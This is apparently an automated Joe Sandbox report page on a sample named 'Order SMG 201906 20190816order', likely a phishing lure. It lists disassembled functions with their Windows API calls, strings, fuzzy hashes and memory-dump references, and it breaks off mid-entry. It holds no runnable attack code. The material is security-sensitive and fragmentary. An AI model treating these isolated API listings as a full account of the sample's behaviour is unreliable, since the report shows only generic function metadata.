Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: a2a74fddaa6c3cd3c03317601c7c16233c3959efa95fba5e0452c389bbffce1a
Instruction ID: e35dea41237fcbc3d60db0d7b0801f268ac0ee7baed950b9ceceedc0e64d78fd
Opcode Fuzzy Hash: a2a74fddaa6c3cd3c03317601c7c16233c3959efa95fba5e0452c389bbffce1a
Instruction Fuzzy Hash: FD31B231601605ABDB118E34CC41BEB77A9EF49324F24472AF875A32E1D738E8609B5A

Function 00455180 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 96networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00455190
InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 004551C6

Strings

DE, xrefs: 0045522E
|, xrefs: 004551B5

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |$DE
API String ID: 1413715105-2586410654
Opcode ID: cb3efb7376b2ee8b3b9d292cd61c4e768093f9ed3e25bdc4c130753edd66b9fc
Instruction ID: 7ff0a5d39f7edaf8f80adf74e6cb1badfa182ff46140bd3db269d441b7208e6c
Opcode Fuzzy Hash: cb3efb7376b2ee8b3b9d292cd61c4e768093f9ed3e25bdc4c130753edd66b9fc
Instruction Fuzzy Hash: 66311871C00119ABCF01AFE5CD85AEE7FB9FF18704F00016AF815B6166DA35A916DBA4

Function 004265C3 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 94COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 004265DD

Strings

ineI, xrefs: 00426697
Genu, xrefs: 0042668E
ntel, xrefs: 004266A0

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID: Genu$ineI$ntel
API String ID: 2325560087-3389352399
Opcode ID: 1d2fb795ab2630eafa0019d05c0f064e3e45d6c2203518a7fa2bd224cceb535b
Instruction ID: 70bd78075be79bc63eaedba959a511e25b21ed375f2f1a9c0171fd3cd016e052
Opcode Fuzzy Hash: 1d2fb795ab2630eafa0019d05c0f064e3e45d6c2203518a7fa2bd224cceb535b
Instruction Fuzzy Hash: 0A3169B1E01626DBDB248F69E845A5AFBB0FB00314F61853FE419E7390C3799860CF48

Function 0046A0D6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 0046A15E
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 0046A172
SendMessageW.USER32(?,00001002,00000000,?), ref: 0046A196

Strings

SysMonthCal32, xrefs: 0046A129

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: 416cc77b0198d72f98cea775319e80d4bf96db53c998f8ae22c1170698be4b66
Instruction ID: 2be483add4762aa6c11c59ba3fc8898740279692600701ed87bb33f31a59144f
Opcode Fuzzy Hash: 416cc77b0198d72f98cea775319e80d4bf96db53c998f8ae22c1170698be4b66
Instruction Fuzzy Hash: 8021BF32510218ABEF118F94CC42FEA3B79EF49714F100215FA557B1D0E6B9AC51CBA9

Function 0046A88A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0046A941
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0046A94F
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0046A956

Strings

msctls_updown32, xrefs: 0046A8BB

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 1067a081f2408370cafea43e1f8b9025aec776f1afa58adc9aec223e14090407
Instruction ID: 5f55c68ffc2c420652bad11bb8842fcf2bc24ed935bcb913f205816fc4057d67
Opcode Fuzzy Hash: 1067a081f2408370cafea43e1f8b9025aec776f1afa58adc9aec223e14090407
Instruction Fuzzy Hash: 5E21B5B5600609AFDB00DF18CC81D7737ADEF5A358B15045AFA04A7361DB34EC118B66

Function 004699A5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00469A30
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00469A40
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00469A65

Strings

Listbox, xrefs: 004699FD

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 55abba76bdb70e6f6f0b814dc0b9ec6822e3006a87f819b5f8b7ae85f65f963d
Instruction ID: 3b4956b643eecce6224433c2417d11628b8cdfed21514b37325c140564583a90
Opcode Fuzzy Hash: 55abba76bdb70e6f6f0b814dc0b9ec6822e3006a87f819b5f8b7ae85f65f963d
Instruction Fuzzy Hash: 62210772600118BFDF118F54CC85FBF3BAEEF89760F01812AF94497290D6B59C1187A4

Function 0046A409 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0046A46D
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 0046A482
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 0046A48F

Strings

msctls_trackbar32, xrefs: 0046A444

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 41754b513def9cf98bdc0798ae0aa73d5b25d3dfe951ac7db443d47a0928b724
Instruction ID: 66ff69cd09a3b487b2c32ef9eb509d7a9d7ee40f74df3f0d23145d62b3b9f1d8
Opcode Fuzzy Hash: 41754b513def9cf98bdc0798ae0aa73d5b25d3dfe951ac7db443d47a0928b724
Instruction Fuzzy Hash: C711E771200208BEEF209F65CC49FEB3769EF89754F014129FA45A6191E6B6E821CB29

Function 00422288 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize), ref: 004222A1
GetProcAddress.KERNEL32(00000000), ref: 004222A8

Strings

combase.dll, xrefs: 0042229C
RoInitialize, xrefs: 00422290

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RoInitialize$combase.dll
API String ID: 2574300362-340411864
Opcode ID: 4e75dda207195a5402553ecb10b320a967d0e508d7137d6f43ebeff1edc3ae77
Instruction ID: 087af8f994851414ed91025c5873fa06cb3c72a2f104b9e5d9c746a14a2aec99
Opcode Fuzzy Hash: 4e75dda207195a5402553ecb10b320a967d0e508d7137d6f43ebeff1edc3ae77
Instruction Fuzzy Hash: 1BE01A70A95300ABDBA06F70AD8EF097B55AB00B05F644879B182D50E0DFBA8050CB0C

Function 00422287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize), ref: 004222A1
GetProcAddress.KERNEL32(00000000), ref: 004222A8

Strings

combase.dll, xrefs: 0042229C
RoInitialize, xrefs: 00422290

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RoInitialize$combase.dll
API String ID: 2574300362-340411864
Opcode ID: e9fd811a80a71518bf4f805e687ca4f7756e9ad81c539e6b4e58b02fe1fdfb95
Instruction ID: e17da66c082af5be0f5654c7df667125dcdf0815918c6697de16127385734e4a
Opcode Fuzzy Hash: e9fd811a80a71518bf4f805e687ca4f7756e9ad81c539e6b4e58b02fe1fdfb95
Instruction Fuzzy Hash: 11E01730F95301FBDA602B70AE4AF293714AB00B06FA048B5B242E90E4CFEA84408B1C

Function 0042235C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00422276), ref: 00422376
GetProcAddress.KERNEL32(00000000), ref: 0042237D

Strings

RoUninitialize, xrefs: 00422365
combase.dll, xrefs: 00422371

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 2574300362-2819208100
Opcode ID: cc2458d9b27f12e467078e358ecd1c04f906aebff1626c1a0176e98f2339ae44
Instruction ID: c2c24ff20b62a58202260a8ac82467be98224401b9ca7413dff3875aec422145
Opcode Fuzzy Hash: cc2458d9b27f12e467078e358ecd1c04f906aebff1626c1a0176e98f2339ae44
Instruction Fuzzy Hash: 38E09270A46304EFDB61AFA1AD0DF097B64B700706F240835F509921F0CBBA94108B1C

Function 00462205 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,004621FB,?,0045F860), ref: 00462213
GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00462225

Strings

GetProcessId, xrefs: 0046221F
kernel32.dll, xrefs: 0046220E

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetProcessId$kernel32.dll
API String ID: 2574300362-399901964
Opcode ID: 4672b02b6f7d0dac65ec5901e40b4342e39f77d97c34674ee84bdd586e5f51d9
Instruction ID: 394556c6ca59c9a21163b339209c69f1bda373faab45590677b55d6d9d69d704
Opcode Fuzzy Hash: 4672b02b6f7d0dac65ec5901e40b4342e39f77d97c34674ee84bdd586e5f51d9
Instruction Fuzzy Hash: 82D05E34801B12AFC7215B31A90864677D4AF04704B10486FA841A2290E6B8D8808768

Function 004042F6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000000,004042EC,?,004042AA,?), ref: 00404304
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00404316

Strings

Wow64RevertWow64FsRedirection, xrefs: 00404310
kernel32.dll, xrefs: 004042FF

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: 4a37fa3291129964a241e8de426e1356e45d924d261400878f2f182de93ac0a0
Instruction ID: 8e2625daa83c3a9d930da8d8dbc3e06159fd1fb9ec63ca39b981bd2942dc7d0d
Opcode Fuzzy Hash: 4a37fa3291129964a241e8de426e1356e45d924d261400878f2f182de93ac0a0
Instruction Fuzzy Hash: A0D0A7B0900712AFCB205F21EC0C74677D4AF44701B10483FE941E22F4D7B8C8808728

Function 0040434B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,004041BB,00404341,?,0040422F,?,004041BB,?,?,?,?,004039FE,?,00000001), ref: 00404359
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0040436B

Strings

Wow64DisableWow64FsRedirection, xrefs: 00404365
kernel32.dll, xrefs: 00404354

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: f18a1eb44fc03b215405c2f488851209d35c2333f536a3cdba6b19ecfb51a2a7
Instruction ID: 3d90eeb04a118de8df55b6892bbe8ede2cd4c825abe2ba33daa0fdaf18675234
Opcode Fuzzy Hash: f18a1eb44fc03b215405c2f488851209d35c2333f536a3cdba6b19ecfb51a2a7
Instruction Fuzzy Hash: C9D0A7B0900712AFC7305F35E80CB4677D4AF10715B10483FE881E22D0D7B8D8808728

Function 00440564 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(oleaut32.dll,00000000,0044052F,?,004406D7), ref: 00440572
GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00440584

Strings

UnRegisterTypeLibForUser, xrefs: 0044057E
oleaut32.dll, xrefs: 0044056D

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: UnRegisterTypeLibForUser$oleaut32.dll
API String ID: 2574300362-1587604923
Opcode ID: e747ec9e98adbaa7c88cbe1a7674578dd7cdd693dc1e62a189552bf39c7ba6c7
Instruction ID: b5979cb841ee170266d89ba9e623a11cea52974f8194418e85b48c4c5a062689
Opcode Fuzzy Hash: e747ec9e98adbaa7c88cbe1a7674578dd7cdd693dc1e62a189552bf39c7ba6c7
Instruction Fuzzy Hash: 43D05E31800712AAD7209F20A80CB5677E4AF04700B20892FE94192294D6B8C4908B28

Function 00440539 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(oleaut32.dll,?,0044051D,?,004405FE), ref: 00440547
GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00440559

Strings

oleaut32.dll, xrefs: 00440542
RegisterTypeLibForUser, xrefs: 00440553

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegisterTypeLibForUser$oleaut32.dll
API String ID: 2574300362-1071820185
Opcode ID: 1baa843c15d4aa84f7371d9cfd441dae3656d134a11f4f2df08628294462d9bd
Instruction ID: 7c59fbfb6b4ca0e17cfd6f52eeb59ceeab1eb4fde61983d69c0c64ea1134d3dc
Opcode Fuzzy Hash: 1baa843c15d4aa84f7371d9cfd441dae3656d134a11f4f2df08628294462d9bd
Instruction Fuzzy Hash: F9D0A730800722AFD720DF20F80C75677E4EF10701B20CC3FE44AD2294D6B8C8808B28

Function 0045BADD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,0045BAD3,?,0045AA3F), ref: 0045BAEB
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 0045BAFD

Strings

GetModuleHandleExW, xrefs: 0045BAF7
kernel32.dll, xrefs: 0045BAE6

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: 3b01498c38b39de185afe055707ce5a59db452124adc4e1e91c2b7daaa14a2b7
Instruction ID: d2e0bc0dcdf443ce010d5c4e0a58309edda326cdcd35253c4ce8c4ac77bf30ec
Opcode Fuzzy Hash: 3b01498c38b39de185afe055707ce5a59db452124adc4e1e91c2b7daaa14a2b7
Instruction Fuzzy Hash: AFD05E30C00B129EC730AF22A848B5677D4AF00701B10482FE84392694D7B8D884C768

Function 00463BDB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,00463BD1,?,00462B04), ref: 00463BE9
